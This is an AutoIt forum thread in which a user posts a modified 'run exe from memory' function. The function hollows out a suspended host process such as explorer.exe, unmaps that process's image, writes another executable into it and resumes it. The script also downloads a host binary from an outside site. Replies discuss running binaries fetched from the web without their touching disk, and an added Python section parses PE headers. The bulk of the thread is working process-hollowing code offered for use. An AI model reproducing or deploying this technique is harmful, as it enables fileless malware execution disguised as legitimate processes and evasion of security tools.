IchBistTod Posted June 18, 2010 (edited)

I was recently trying to get trancexx's memory injection script to work on both 64- and 32-bit systems. I realized the solution: the file being injected into had to be 1) larger than the exe you are attempting to execute and 2) a 32-bit application. I took the time to look through the Windows 7 and Vista 32-bit files in the SysWOW64 folder, and none can be used to execute files from memory; they give an initialization error. I see this may be related to the fact that some or most are compiled with .NET and/or have protection from such methods. So my solution was to make a small script modification and add a switch to determine which file to use. I know there might have been a cleaner way to do this, but here is my go at it.

PS: the file I use on 64-bit is reshacker.exe, a publicly available program; just Google it.

Tested on XP 32-bit, Windows 7 64-bit and Windows Vista 64-bit. Not tested on Vista or 7 32-bit.

MUST BE COMPILED TO 32 BIT REGARDLESS OF OPERATING SYSTEM
MUST USE A 32 BIT EXE TO INJECT INTO MEMORY

```autoit
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_UseX64=n
#AutoIt3Wrapper_Res_Language=1033
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****

Global $baseexe
$baseexe = @WindowsDir & "\explorer.exe"

If @OSArch = "X64" Then
    ; if not 32-bit, download reshacker and set it to be used
    If Not FileExists(@ScriptDir & "\launcher.exe") Then
        InetGet("http://panics.co.cc/downloads/reshacker.exe", @ScriptDir & "\launcher.exe")
    EndIf
    $baseexe = @ScriptDir & "\launcher.exe"
Else
    $baseexe = @WindowsDir & "\explorer.exe" ; else use explorer
EndIf

; YOUR CODE HERE

Func _RunExeFromMemory($bBinaryImage, $iCompressed = 0, $test = 0)

    #Region 1. PREPROCESSING PASSED
    Local $tInput = DllStructCreate("byte[" & BinaryLen($bBinaryImage) & "]")
    DllStructSetData($tInput, 1, $bBinaryImage)

    Local $pPointer
    Local $aCall

    If $iCompressed Then
        ; Buffer for decompressed data
        Local $tBuffer = DllStructCreate("byte[" & 32 * DllStructGetSize($tInput) & "]") ; oversizing it
        ; Decompression follows:
        $aCall = DllCall("ntdll.dll", "int", "RtlDecompressBuffer", _
                "ushort", 2, _ ; COMPRESSION_FORMAT_LZNT1
                "ptr", DllStructGetPtr($tBuffer), _
                "dword", DllStructGetSize($tBuffer), _
                "ptr", DllStructGetPtr($tInput), _
                "dword", DllStructGetSize($tInput), _
                "dword*", 0)
        If @error Or $aCall[0] Then
            ; If any troubles try original data anyway
            $pPointer = DllStructGetPtr($tInput)
        Else
            $pPointer = DllStructGetPtr($tBuffer)
        EndIf
    Else
        ; Not compressed
        $pPointer = DllStructGetPtr($tInput)
    EndIf

    #Region 2. CREATING NEW PROCESS
    ; STARTUPINFO structure (actually all that really matters is allocated space)
    Local $tSTARTUPINFO = DllStructCreate("dword cbSize;" & _
            "ptr Reserved;" & _
            "ptr Desktop;" & _
            "ptr Title;" & _
            "dword X;" & _
            "dword Y;" & _
            "dword XSize;" & _
            "dword YSize;" & _
            "dword XCountChars;" & _
            "dword YCountChars;" & _
            "dword FillAttribute;" & _
            "dword Flags;" & _
            "ushort ShowWindow;" & _
            "ushort cbReserved2;" & _
            "ptr lpReserved2;" & _
            "ptr hStdInput;" & _
            "ptr hStdOutput;" & _
            "ptr hStdError")
    DllStructSetData($tSTARTUPINFO, "cbSize", DllStructGetSize($tSTARTUPINFO))

    ; This is very important. This structure will hold some very important data.
    Local $tPROCESS_INFORMATION = DllStructCreate("ptr Process;" & _
            "ptr Thread;" & _
            "dword ProcessId;" & _
            "dword ThreadId")

    ; Create new process
    $aCall = DllCall("kernel32.dll", "int", "CreateProcessW", _
            "wstr", $baseexe, _ ; the host ("shell") exe; only its address range plays, giving us a space
            "ptr", 0, _
            "ptr", 0, _
            "ptr", 0, _
            "int", 0, _
            "dword", 4, _ ; CREATE_SUSPENDED ; <- this is essential
            "ptr", 0, _
            "ptr", 0, _
            "ptr", DllStructGetPtr($tSTARTUPINFO), _
            "ptr", DllStructGetPtr($tPROCESS_INFORMATION))
    If @error Or Not $aCall[0] Then
        Return SetError(2, 0, 0) ; CreateProcess function or call to it failed
    EndIf

    ; New process and thread handles:
    Local $hProcess = DllStructGetData($tPROCESS_INFORMATION, "Process")
    Local $hThread = DllStructGetData($tPROCESS_INFORMATION, "Thread")

    #Region 3. FILL CONTEXT STRUCTURE
    ; CONTEXT structure is what's really important here. It's very 'mysterious'
    Local $tCONTEXT = DllStructCreate("dword ContextFlags;" & _
            "dword Dr0;" & _
            "dword Dr1;" & _
            "dword Dr2;" & _
            "dword Dr3;" & _
            "dword Dr6;" & _
            "dword Dr7;" & _
            "dword ControlWord;" & _
            "dword StatusWord;" & _
            "dword TagWord;" & _
            "dword ErrorOffset;" & _
            "dword ErrorSelector;" & _
            "dword DataOffset;" & _
            "dword DataSelector;" & _
            "byte RegisterArea[80];" & _
            "dword Cr0NpxState;" & _
            "dword SegGs;" & _
            "dword SegFs;" & _
            "dword SegEs;" & _
            "dword SegDs;" & _
            "dword Edi;" & _
            "dword Esi;" & _
            "dword Ebx;" & _ ; this is a pointer to another structure (the PEB) whose third element will be altered
            "dword Edx;" & _
            "dword Ecx;" & _
            "dword Eax;" & _ ; another manipulation point (will set address of entry point here)
            "dword Ebp;" & _
            "dword Eip;" & _
            "dword SegCs;" & _
            "dword EFlags;" & _
            "dword Esp;" & _
            "dword SegSs")
    DllStructSetData($tCONTEXT, "ContextFlags", 0x10002) ; CONTEXT_INTEGER

    ; Fill tCONTEXT structure:
    $aCall = DllCall("kernel32.dll", "int", "GetThreadContext", _
            "ptr", $hThread, _
            "ptr", DllStructGetPtr($tCONTEXT))
    If @error Or Not $aCall[0] Then
        DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0)
        Return SetError(3, 0, 0) ; GetThreadContext function or call to it failed
    EndIf

    #Region 4. READ PE-FORMAT
    ; Start processing passed binary data. 'Reading' PE format follows.
    Local $tIMAGE_DOS_HEADER = DllStructCreate("char Magic[2];" & _
            "ushort BytesOnLastPage;" & _
            "ushort Pages;" & _
            "ushort Relocations;" & _
            "ushort SizeofHeader;" & _
            "ushort MinimumExtra;" & _
            "ushort MaximumExtra;" & _
            "ushort SS;" & _
            "ushort SP;" & _
            "ushort Checksum;" & _
            "ushort IP;" & _
            "ushort CS;" & _
            "ushort Relocation;" & _
            "ushort Overlay;" & _
            "char Reserved[8];" & _
            "ushort OEMIdentifier;" & _
            "ushort OEMInformation;" & _
            "char Reserved2[20];" & _
            "dword AddressOfNewExeHeader", _
            $pPointer)
    ; Move pointer
    $pPointer += DllStructGetData($tIMAGE_DOS_HEADER, "AddressOfNewExeHeader") ; move to PE file header

    Local $sMagic = DllStructGetData($tIMAGE_DOS_HEADER, "Magic")
    ; Check if it's valid format
    If Not ($sMagic == "MZ") Then
        DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0)
        Return SetError(4, 0, 0) ; MS-DOS header missing. Btw 'MZ' are the initials of Mark Zbikowski in case you didn't know.
    EndIf

    Local $tIMAGE_NT_SIGNATURE = DllStructCreate("dword Signature", $pPointer)
    ; Move pointer
    $pPointer += 4 ; size of $tIMAGE_NT_SIGNATURE structure
    ; Check signature
    If DllStructGetData($tIMAGE_NT_SIGNATURE, "Signature") <> 17744 Then ; IMAGE_NT_SIGNATURE
        DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0)
        Return SetError(5, 0, 0) ; wrong signature. For PE image should be "PE\0\0" or 17744 dword.
    EndIf

    Local $tIMAGE_FILE_HEADER = DllStructCreate("ushort Machine;" & _
            "ushort NumberOfSections;" & _
            "dword TimeDateStamp;" & _
            "dword PointerToSymbolTable;" & _
            "dword NumberOfSymbols;" & _
            "ushort SizeOfOptionalHeader;" & _
            "ushort Characteristics", _
            $pPointer)
    ; Get number of sections
    Local $iNumberOfSections = DllStructGetData($tIMAGE_FILE_HEADER, "NumberOfSections")
    ; Move pointer
    $pPointer += 20 ; size of $tIMAGE_FILE_HEADER structure

    Local $tIMAGE_OPTIONAL_HEADER = DllStructCreate("ushort Magic;" & _
            "ubyte MajorLinkerVersion;" & _
            "ubyte MinorLinkerVersion;" & _
            "dword SizeOfCode;" & _
            "dword SizeOfInitializedData;" & _
            "dword SizeOfUninitializedData;" & _
            "dword AddressOfEntryPoint;" & _
            "dword BaseOfCode;" & _
            "dword BaseOfData;" & _
            "dword ImageBase;" & _
            "dword SectionAlignment;" & _
            "dword FileAlignment;" & _
            "ushort MajorOperatingSystemVersion;" & _
            "ushort MinorOperatingSystemVersion;" & _
            "ushort MajorImageVersion;" & _
            "ushort MinorImageVersion;" & _
            "ushort MajorSubsystemVersion;" & _
            "ushort MinorSubsystemVersion;" & _
            "dword Win32VersionValue;" & _
            "dword SizeOfImage;" & _
            "dword SizeOfHeaders;" & _
            "dword CheckSum;" & _
            "ushort Subsystem;" & _
            "ushort DllCharacteristics;" & _
            "dword SizeOfStackReserve;" & _
            "dword SizeOfStackCommit;" & _
            "dword SizeOfHeapReserve;" & _
            "dword SizeOfHeapCommit;" & _
            "dword LoaderFlags;" & _
            "dword NumberOfRvaAndSizes", _
            $pPointer)
    ; Move pointer
    $pPointer += 96 ; size of $tIMAGE_OPTIONAL_HEADER

    Local $iMagic = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "Magic")
    ; Check if it's 32-bit application
    If $iMagic <> 267 Then
        DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0)
        Return SetError(6, 0, 0) ; not 32-bit application. Structures (and sizes) are for 32-bit apps.
    EndIf
    If $test = 1 And $iMagic <> 267 Then ; note: never reached, the check above already returned for a non-32-bit image
        DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0)
        Return 0
    EndIf

    ; Extract entry point address
    Local $iEntryPointNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "AddressOfEntryPoint") ; the loaded binary image would start executing at this (relative) address
    ; Move pointer
    $pPointer += 128 ; size of the data directories before IMAGE_SECTION_HEADER (16 entries of 8 bytes - see the PE specification if you are interested).

    Local $pOptionalHeaderImageBaseNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "ImageBase") ; address of the first byte of the image when it's loaded in memory
    Local $iOptionalHeaderSizeOfImageNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "SizeOfImage") ; the size of the image including all headers

    #Region 5. GET AND THEN CHANGE BASE ADDRESS
    ; Read base address
    Local $tPEB = DllStructCreate("byte InheritedAddressSpace;" & _
            "byte ReadImageFileExecOptions;" & _
            "byte BeingDebugged;" & _
            "byte Spare;" & _
            "ptr Mutant;" & _
            "ptr ImageBaseAddress;" & _
            "ptr LoaderData;" & _
            "ptr ProcessParameters;" & _
            "ptr SubSystemData;" & _
            "ptr ProcessHeap;" & _
            "ptr FastPebLock;" & _
            "ptr FastPebLockRoutine;" & _
            "ptr FastPebUnlockRoutine;" & _
            "dword EnvironmentUpdateCount;" & _
            "ptr KernelCallbackTable;" & _
            "ptr EventLogSection;" & _
            "ptr EventLog;" & _
            "ptr FreeList;" & _
            "dword TlsExpansionCounter;" & _
            "ptr TlsBitmap;" & _
            "dword TlsBitmapBits[2];" & _
            "ptr ReadOnlySharedMemoryBase;" & _
            "ptr ReadOnlySharedMemoryHeap;" & _
            "ptr ReadOnlyStaticServerData;" & _
            "ptr AnsiCodePageData;" & _
            "ptr OemCodePageData;" & _
            "ptr UnicodeCaseTableData;" & _
            "dword NumberOfProcessors;" & _
            "dword NtGlobalFlag;" & _
            "ubyte Spare2[4];" & _
            "int64 CriticalSectionTimeout;" & _
            "dword HeapSegmentReserve;" & _
            "dword HeapSegmentCommit;" & _
            "dword HeapDeCommitTotalFreeThreshold;" & _
            "dword HeapDeCommitFreeBlockThreshold;" & _
            "dword NumberOfHeaps;" & _
            "dword MaximumNumberOfHeaps;" & _
            "ptr ProcessHeaps;" & _
            "ptr GdiSharedHandleTable;" & _
            "ptr ProcessStarterHelper;" & _
            "ptr GdiDCAttributeList;" & _
            "ptr LoaderLock;" & _
            "dword OSMajorVersion;" & _
            "dword OSMinorVersion;" & _
            "dword OSBuildNumber;" & _
            "dword OSPlatformId;" & _
            "dword ImageSubSystem;" & _
            "dword ImageSubSystemMajorVersion;" & _
            "dword ImageSubSystemMinorVersion;" & _
            "dword GdiHandleBuffer[34];" & _
            "dword PostProcessInitRoutine;" & _
            "dword TlsExpansionBitmap;" & _
            "ubyte TlsExpansionBitmapBits[128];" & _
            "dword SessionId")

    $aCall = DllCall("kernel32.dll", "int", "ReadProcessMemory", _
            "ptr", $hProcess, _
            "ptr", DllStructGetData($tCONTEXT, "Ebx"), _ ; Ebx of the suspended main thread points at the PEB
            "ptr", DllStructGetPtr($tPEB), _
            "dword", DllStructGetSize($tPEB), _
            "dword*", 0)
    If @error Or Not $aCall[0] Then
        DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0)
        Return SetError(7, 0, 0) ; ReadProcessMemory function or call to it failed while filling PEB structure
    EndIf

    Local $hBaseAddress = DllStructGetData($tPEB, "ImageBaseAddress")

    ; Short version of the above
    #cs
    $aCall = DllCall("kernel32.dll", "int", "ReadProcessMemory", _
            "ptr", $hProcess, _
            "ptr", DllStructGetData($tCONTEXT, "Ebx") + 8, _
            "ptr*", 0, _
            "dword", 4, _
            "dword*", 0)
    If @error Or Not $aCall[0] Then
        DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0)
        Return SetError(7, 0, 0) ; ReadProcessMemory function or call to it failed while reading base address of the process
    EndIf
    Local $hBaseAddress = $aCall[3]
    #ce

    ; Write new base address
    $aCall = DllCall("kernel32.dll", "int", "WriteProcessMemory", _
            "ptr", $hProcess, _
            "ptr", DllStructGetData($tCONTEXT, "Ebx") + 8, _ ; PEB.ImageBaseAddress
            "ptr*", $pOptionalHeaderImageBaseNEW, _
            "dword", 4, _
            "dword*", 0)
    If @error Or Not $aCall[0] Then
        DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0)
        Return SetError(8, 0, 0) ; WriteProcessMemory function or call to it failed while writing new base address
    EndIf

    #Region 6. CLEAR EVERYTHING THAT THIS NEW PROCESS HAS MAPPED
    ; Clear old data.
    $aCall = DllCall("ntdll.dll", "int", "NtUnmapViewOfSection", _
            "ptr", $hProcess, _
            "ptr", $hBaseAddress)
    If @error Or $aCall[0] Then
        DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0)
        Return SetError(9, 0, 0) ; NtUnmapViewOfSection function or call to it failed
    EndIf

    #Region 7. ALLOCATE 'NEW' MEMORY SPACE
    ; Allocate proper size of memory at the proper place.
    $aCall = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", _
            "ptr", $hProcess, _
            "ptr", $pOptionalHeaderImageBaseNEW, _
            "dword", $iOptionalHeaderSizeOfImageNEW, _
            "dword", 12288, _ ; MEM_COMMIT|MEM_RESERVE
            "dword", 64) ; PAGE_EXECUTE_READWRITE
    If @error Or Not $aCall[0] Then
        DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0)
        Return SetError(10, 0, 0) ; VirtualAllocEx function or call to it failed
    EndIf

    Local $pRemoteCode = $aCall[0] ; from now on this is zero-point

    #Region 8. GET AND WRITE NEW PE-HEADERS
    Local $pHEADERS_NEW = DllStructGetPtr($tIMAGE_DOS_HEADER) ; starting address of binary image headers
    Local $iOptionalHeaderSizeOfHeadersNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "SizeOfHeaders") ; the size of the MS-DOS stub, the PE header, and the section headers

    ; Write NEW headers
    $aCall = DllCall("kernel32.dll", "int", "WriteProcessMemory", _
            "ptr", $hProcess, _
            "ptr", $pRemoteCode, _
            "ptr", $pHEADERS_NEW, _
            "dword", $iOptionalHeaderSizeOfHeadersNEW, _
            "dword*", 0)
    If @error Or Not $aCall[0] Then
        DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0)
        Return SetError(11, 0, 0) ; WriteProcessMemory function or call to it while writing new PE headers failed
    EndIf

    #Region 9. WRITE SECTIONS
    ; Dealing with sections. Will write them too as they hold all needed data that PE loader reads
    Local $tIMAGE_SECTION_HEADER
    Local $iSizeOfRawData, $pPointerToRawData
    Local $iVirtualAddress

    For $i = 1 To $iNumberOfSections
        $tIMAGE_SECTION_HEADER = DllStructCreate("char Name[8];" & _
                "dword UnionOfVirtualSizeAndPhysicalAddress;" & _
                "dword VirtualAddress;" & _
                "dword SizeOfRawData;" & _
                "dword PointerToRawData;" & _
                "dword PointerToRelocations;" & _
                "dword PointerToLinenumbers;" & _
                "ushort NumberOfRelocations;" & _
                "ushort NumberOfLinenumbers;" & _
                "dword Characteristics", _
                $pPointer)

        $iSizeOfRawData = DllStructGetData($tIMAGE_SECTION_HEADER, "SizeOfRawData")
        $pPointerToRawData = DllStructGetPtr($tIMAGE_DOS_HEADER) + DllStructGetData($tIMAGE_SECTION_HEADER, "PointerToRawData")
        $iVirtualAddress = DllStructGetData($tIMAGE_SECTION_HEADER, "VirtualAddress")

        ; If there is data to write, write it where it should be written
        If $iSizeOfRawData Then
            $aCall = DllCall("kernel32.dll", "int", "WriteProcessMemory", _
                    "ptr", $hProcess, _
                    "ptr", $pRemoteCode + $iVirtualAddress, _
                    "ptr", $pPointerToRawData, _
                    "dword", $iSizeOfRawData, _
                    "dword*", 0)
            If @error Or Not $aCall[0] Then
                DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0)
                Return SetError(12, $i, 0) ; WriteProcessMemory function or call to it while writing new sections failed
            EndIf
        EndIf

        ; Move pointer
        $pPointer += 40 ; size of $tIMAGE_SECTION_HEADER structure
    Next

    #Region 10. NEW ENTRY POINT
    ; Entry point manipulation
    DllStructSetData($tCONTEXT, "Eax", $pRemoteCode + $iEntryPointNEW) ; $iEntryPointNEW was relative address

    #Region 11. SET NEW CONTEXT
    ; New context:
    $aCall = DllCall("kernel32.dll", "int", "SetThreadContext", _
            "ptr", $hThread, _
            "ptr", DllStructGetPtr($tCONTEXT))
    If @error Or Not $aCall[0] Then
        DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0)
        Return SetError(13, 0, 0) ; SetThreadContext function or call to it failed
    EndIf

    #Region 12. RESUME THREAD
    ; And that's it! Continue execution
    $aCall = DllCall("kernel32.dll", "int", "ResumeThread", "ptr", $hThread)
    If @error Or $aCall[0] = -1 Then
        DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $hProcess, "dword", 0)
        Return SetError(14, 0, 0) ; ResumeThread function or call to it failed
    EndIf

    #Region 13. RETURN SUCCESS
    ; All went well. Return, for example, new PID:
    Return DllStructGetData($tPROCESS_INFORMATION, "ProcessId")

EndFunc   ;==>_RunExeFromMemory
```

Edited June 18, 2010 by IchBistTod
Tinnu Posted June 20, 2010

Can you explain what the benefit of running an exe from memory is?
IchBistTod Posted June 21, 2010

> Can you explain what the benefit of running an exe from memory is?

The ability to run an exe without ever having to place it on the user's hard drive. For example, using _InetGetSource() to get the binary and then running it from memory would mean it never touches the user's hard drive. There are many uses, but I find this form of cloud executing the most useful.
Tinnu Posted June 21, 2010

It means the script will run directly from RAM and not from the HDD?
Shafayat Posted June 22, 2010

> It means the script will run directly from RAM and not from the HDD?

That's affirmative. But isn't it too obvious? After reading the first post in the thread, this question should not arise.
WeMartiansAreFriendly Posted June 22, 2010

> ; CONTEXT structure is what's really important here. It's very 'mysterious'

Why do you use global variables [$baseexe] in your function? Maybe a better example and some documentation would clear up the confusion.
IchBistTod Posted June 22, 2010 (edited)

Also, a note to everyone: no, simply creating a .exe with null data, or "pumping" an exe to make it bigger, won't work. Windows considers the end of the binary for the app to be the total size of the base exe.

Edited June 23, 2010 by IchBistTod
Shafayat Posted June 23, 2010

> No, simply creating a .exe with null data, or "pumping" an exe to make it bigger, won't work.

How do you suggest to perfectly increase the size without flagging an error event at runtime? My experiment was a failure regarding this.
IchBistTod Posted June 23, 2010

> How do you suggest to perfectly increase the size without flagging an error event at runtime? My experiment was a failure regarding this.

Well, right now, as I'm using it to run exes off the web, I'm simply limiting my tools to <800 KB. However, if you wanted to store it in the exe, you could try putting the binary of the app you want to run in the resource data of the AutoIt exe and using @ScriptFullPath for the base exe, making it launch off itself (which SHOULD work because the AutoIt exe would be the size of the binary in the resources plus the original size). This is untested, but I'm pretty sure Windows counts binary resource data into the total size of the file.
Shafayat Posted June 23, 2010

Thank you. I am going to test it tonight with @ScriptFullPath.
IchBistTod Posted June 24, 2010

Also take note of my EOF function, which is required for some files to be run from memory: http://www.autoitscript.com/forum/index.php?showtopic=116022
IchBistTod Posted July 1, 2010

> Why do you use global variables [$baseexe] in your function? Maybe a better example and some documentation would clear up the confusion.

This global variable is the location, on the local machine, of a 32-bit exe larger than the file to execute from memory. This will be a "shell" for the binary you want to execute. It will appear to the OS as if you are launching this file; however, the process is stopped at runtime and your binary is injected into the process. On Vista and 7 this file must be larger than the binary you are executing (for security reasons), and it must always be a 32-bit exe. Using a switch to declare this exe based on the environment allows it to be declared/downloaded only once and multiple calls to the function to be made off that one base exe. I hope I explained this correctly. I am a bit tired.
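The PE fields that Region 4 of the function in the first post reads, and the two host-exe rules IchBistTod states in the post above (the `$baseexe` host must be a 32-bit exe and must be larger than the binary being run), can both be checked offline before anything is launched. What follows is an added example written for this page in Python; it is not code from the thread or from trancexx's UDF. It walks the same headers the AutoIt code walks (with the bounds checks the AutoIt code omits), lists the WriteProcessMemory operations the routine would issue (headers at RVA 0, then each section's raw data at its VirtualAddress), computes the value the routine places in Eax, and applies the thread's host rules. `build_sample_pe32` constructs a minimal, non-runnable PE32 image purely as sample input; reading "larger" as a comparison of file lengths is this example's assumption about the post, not something the post spells out.

```python
"""Added example for this page, not code from the thread or from trancexx's UDF: offline PE checks."""
import struct
from dataclasses import dataclass
from typing import List, Tuple

IMAGE_NT_SIGNATURE = 0x00004550        # "PE\0\0", the 17744 the AutoIt code compares against
IMAGE_NT_OPTIONAL_HDR32_MAGIC = 0x10B  # 267 in the AutoIt code: PE32, a 32-bit image
IMAGE_NT_OPTIONAL_HDR64_MAGIC = 0x20B  # PE32+, a 64-bit image
IMAGE_FILE_MACHINE_I386 = 0x14C

class PEError(ValueError):
    """Conditions the AutoIt routine maps to SetError(4), (5) and (6), plus bounds checks it does not do."""

@dataclass
class Section:
    name: str
    virtual_address: int      # RVA the raw bytes get written to (WriteProcessMemory target)
    size_of_raw_data: int
    pointer_to_raw_data: int  # file offset the raw bytes are read from

@dataclass
class PEInfo:
    magic: int
    image_base: int
    size_of_image: int
    size_of_headers: int
    entry_point_rva: int
    sections: List[Section]

def parse_pe(data: bytes) -> PEInfo:
    """DOS header -> NT signature -> file header -> optional header -> section table, bounds-checked."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise PEError("MS-DOS header missing")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]            # IMAGE_DOS_HEADER.e_lfanew
    if e_lfanew + 24 > len(data) or struct.unpack_from("<I", data, e_lfanew)[0] != IMAGE_NT_SIGNATURE:
        raise PEError("NT signature missing or out of bounds")
    fh = e_lfanew + 4                                             # IMAGE_FILE_HEADER, 20 bytes
    _, nsections, _, _, _, size_opt, _ = struct.unpack_from("<HHIIIHH", data, fh)
    oh = fh + 20                                                  # IMAGE_OPTIONAL_HEADER
    if size_opt < 96 or oh + size_opt > len(data):
        raise PEError("optional header truncated")
    magic = struct.unpack_from("<H", data, oh)[0]
    if magic == IMAGE_NT_OPTIONAL_HDR32_MAGIC:
        image_base = struct.unpack_from("<I", data, oh + 28)[0]   # PE32: 4-byte ImageBase at +28
    elif magic == IMAGE_NT_OPTIONAL_HDR64_MAGIC:
        image_base = struct.unpack_from("<Q", data, oh + 24)[0]   # PE32+: 8-byte ImageBase at +24
    else:
        raise PEError("unknown optional header magic 0x%x" % magic)
    entry_rva = struct.unpack_from("<I", data, oh + 16)[0]        # AddressOfEntryPoint, same offset in both
    size_of_image, size_of_headers = struct.unpack_from("<II", data, oh + 56)
    sections, sh = [], oh + size_opt                              # section table follows the optional header
    for i in range(nsections):
        off = sh + 40 * i                                         # IMAGE_SECTION_HEADER is 40 bytes
        if off + 40 > len(data):
            raise PEError("section table truncated")
        name, _, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, off)
        if raw_size and raw_ptr + raw_size > len(data):
            raise PEError("section %d raw data lies outside the image" % i)
        sections.append(Section(name.rstrip(b"\0").decode("ascii", "replace"), va, raw_size, raw_ptr))
    return PEInfo(magic, image_base, size_of_image, size_of_headers, entry_rva, sections)

def write_plan(info: PEInfo) -> List[Tuple[int, int, int]]:
    """(target RVA, source file offset, length) of each WriteProcessMemory the routine issues: headers, then sections."""
    plan = [(0, 0, info.size_of_headers)]
    for s in info.sections:
        if s.size_of_raw_data:                                    # the AutoIt loop skips sections with no raw data
            plan.append((s.virtual_address, s.pointer_to_raw_data, s.size_of_raw_data))
    return plan

def remote_entry_point(info: PEInfo) -> int:
    """Value the routine puts in Eax: allocation at ImageBase plus the entry RVA (it applies no relocations)."""
    return info.image_base + info.entry_point_rva

def host_check(host: bytes, payload: bytes) -> List[str]:
    """The two host rules stated in the thread; an empty list means the pair passes them."""
    h, p, problems = parse_pe(host), parse_pe(payload), []
    if p.magic != IMAGE_NT_OPTIONAL_HDR32_MAGIC:
        problems.append("payload is not a PE32 (32-bit) image")
    if h.magic != IMAGE_NT_OPTIONAL_HDR32_MAGIC:
        problems.append("host is not a PE32 (32-bit) image")
    if len(host) <= len(payload):                                 # assumption: "larger" means file length
        problems.append("host file is not larger than the payload")
    return problems

def build_sample_pe32(image_base: int = 0x400000, entry_rva: int = 0x1000, overlay: int = 0) -> bytes:
    """Constructed sample input: a minimal PE32 with one .text section. Not a real program; never run it."""
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)   # e_lfanew = 0x40
    file_hdr = struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_I386, 1, 0, 0, 0, 224, 0x0102)
    opt = struct.pack("<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "HH" + "I" * 6,      # 96-byte PE32 optional header
                      IMAGE_NT_OPTIONAL_HDR32_MAGIC, 14, 0, 0x200, 0, 0, entry_rva, 0x1000, 0x2000, image_base,
                      0x1000, 0x200, 4, 0, 0, 0, 4, 0, 0, 0x2000, 0x200, 0, 2, 0, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    data_dirs = b"\0" * 128                                       # 16 empty IMAGE_DATA_DIRECTORY entries
    text_hdr = struct.pack("<8sIIIIIIHHI", b".text", 0x200, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    headers = dos + struct.pack("<I", IMAGE_NT_SIGNATURE) + file_hdr + opt + data_dirs + text_hdr
    headers += b"\0" * (0x200 - len(headers))                     # pad up to SizeOfHeaders
    text = b"\xEB\xFE" + b"\x90" * 0x1FE                           # 'jmp $' then NOPs: placeholder bytes only
    return headers + text + b"\0" * overlay
```

On a real pair of files, `host_check(open(host_path, "rb").read(), open(payload_path, "rb").read())` gives the same verdict the AutoIt code would only reach after it has already created the suspended host process, so a failing pair can be rejected without ever spawning anything. `write_plan` is also a quick way to see that the routine copies raw file bytes to RVAs with no relocation processing: a payload whose preferred ImageBase is not free in the host will fail at the VirtualAllocEx step.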
IchBistTod Posted July 5, 2010 (edited)

> Thank you. I am going to test it tonight with @ScriptFullPath.

So I assume that's a negative on success via the stated method?

Edited July 5, 2010 by IchBistTod
IchBistTod Posted July 5, 2010

Also, two stars? Two freaking stars? Honestly? Those who provided such a rating must either be too ignorant to use it, too ignorant to understand it, or too ignorant to appreciate it. No matter; those intelligent enough to make use of it when such a need arises will have the ability to do so.
Kip Posted July 5, 2010 (edited)

> Also, two stars? Two freaking stars? Honestly? Those who provided such a rating must either be too ignorant to use it, too ignorant to understand it, or too ignorant to appreciate it. No matter; those intelligent enough to make use of it when such a need arises will have the ability to do so.

And just because of that ungrateful post, I rated 1 star. But instead of stars, there should be little red flames to indicate negative ratings.

Edit: You do know where the "Edit" button is, right? Because posting 4 posts right after each other is just "bumping" to me. The last two only have 3 minutes between them, instead of the recommended 24 hours.

Edited July 5, 2010 by Kip
Ascend4nt Posted July 5, 2010

IchBistTod, the post topic is a bit misleading (32/64 bit), especially when you write:

> MUST BE COMPILED TO 32 BIT REGARDLESS OF OPERATING SYSTEM
> MUST USE A 32 BIT EXE TO INJECT INTO MEMORY

And why aren't there any links to trancexx's original 'Run binary' thread you borrow your code from? Also, amazingly, her code works on 64-bit executables (as well as OSes from XP to Win7). The size of exes may be an issue that you resolve, though, so at least that is a bit of progress.
dekadish Posted October 17, 2010

> IchBistTod, the post topic is a bit misleading (32/64 bit), especially when you write: [...] And why aren't there any links to trancexx's original 'Run binary' thread you borrow your code from? Also, amazingly, her code works on 64-bit executables (as well as OSes from XP to Win7). The size of exes may be an issue that you resolve, though, so at least that is a bit of progress.

I have tried it and it works, but it doesn't work on some Windows machines. I tested it on Windows 7 Ultimate and XP, and on some XPs it works and on some it doesn't. I don't know why. Maybe it depends on what language the OS is, or something?
sunsunshine Posted August 17, 2011

IchBistTod, can you give me an example? I used this code, but it failed:

```autoit
$hFile = FileOpen(@SystemDir & "\regedt32.exe", 16) ; 16 = binary mode
$bFile = FileRead($hFile)
FileClose($hFile)
_RunExeFromMemory($bFile)
```
Watson Posted August 17, 2011

> IchBistTod, can you give me an example? I used this code, but it failed:
> $hFile = FileOpen(@SystemDir & "\regedt32.exe", 16)
> $bFile = FileRead($hFile)
> _RunExeFromMemory($bFile)

Try adding:

```autoit
Global $baseexe = @WindowsDir & "\explorer.exe"
```
Magellan Posted August 18, 2011

Hello,

